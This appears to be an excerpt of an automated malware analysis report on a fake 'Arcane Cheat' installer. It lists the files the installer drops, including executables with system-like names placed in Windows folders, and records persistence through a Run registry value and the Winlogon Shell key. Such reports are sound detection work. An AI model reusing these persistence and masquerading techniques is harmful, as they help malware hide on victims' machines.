            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\msvcp120.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\klist.exe (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\javafx_font.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-SGAAD.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\glib-lite.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\java.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jp2native.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-P9144.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-OV1CO.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-ML2GN.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\net.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\prism_common.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-AASG5.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-VI3JJ.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\javacpl.exe (copy)
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeFile created: C:\Recovery\explorer.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\gstreamer-lite.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\mlib_image.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-QS1JT.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\javacpl.cpl (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-78EDT.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\pack200.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-DCG3E.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Users\user\AppData\Local\Temp\is-N4812.tmp\_isetup\_setup64.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\prism_sw.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\sunmscapi.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-9PR86.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\ktab.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-M6OGV.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-F8M96.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\client\is-KHA4M.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge-32.dll (copy)Jump to dropped file
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeFile created: C:\Windows\en-US\qiOZcVoixJLcuAFKAnRd.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-94OVM.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\bci.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-O5MSC.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-F39U2.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-0TC1S.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\dt_socket.dll (copy)Jump to dropped file
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeFile created: C:\Windows\Fonts\qiOZcVoixJLcuAFKAnRd.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\tnameserv.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\glass.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\policytool.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-1NNTS.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\w2k_lsa_auth.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-FLHTG.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-6TBSI.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-D49GQ.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-RJ8O6.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\lcms.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jpeg.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-3CGHC.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-G1B5Q.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\zip.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\client\jvm.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-C92NJ.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-S4T07.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\sunec.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-B9B0I.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\java-rmi.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\kinit.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\unpack.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-23BHM.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\decora_sse.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-DK2B0.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-8BCTR.tmpJump to dropped file
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeFile created: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jdwp.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-LS3UA.tmpJump to dropped file
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeFile created: C:\Recovery\RuntimeBroker.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\java.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jsoundds.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\javaw.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jfxwebkit.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-OMDGH.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\javaws.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\msvcr120.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-M8DR9.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\msvcr100.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jfxmedia.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\resource.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\kcms.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-1D9V4.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-TJN2U.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-RKJ6P.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\ssv.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\plugin2\is-OVE01.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-6EJKR.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-H7O6N.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\prism_d3d.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\rmid.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\dtplugin\is-7TEQQ.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-8GHN8.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-GFQTQ.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jp2launcher.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-FDP9A.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exeFile created: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\t2k.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-RPV0O.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\plugin2\msvcr100.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\npt.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\plugin2\is-1RSEV.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\dtplugin\npdeployJava1.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-069DQ.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-KFFNG.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\javafx_font_t2k.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\unins000.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-3TU72.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-NE044.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-FA3UT.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-7LLC2.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jp2iexp.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\ssvagent.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-90393.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-O1CKK.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\deploy.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jp2ssv.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\dtplugin\deployJava1.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\servertool.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-2KSRS.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\java_crw_demo.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jsound.dll (copy)Jump to dropped file
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeFile created: C:\Windows\addins\audiodg.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-MV7G1.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\dt_shmem.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\unpack200.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-F27BH.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\rmiregistry.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-11A56.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\JavaAccessBridge-32.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\fxplugins.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-RMB9M.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-RBKCS.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jjs.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\Arcane Cheat.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\JavaAccessBridge.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-4UUQJ.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-T1J1I.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jli.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-162RA.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-CSEKM.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-FF2ON.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-PFI2B.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Users\user\AppData\Local\Temp\is-N4812.tmp\_isetup\_shfoldr.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\is-5H46A.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\is-8NKS2.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\javafx_iio.dll (copy)Jump to dropped file

            Boot Survival

            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodgJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
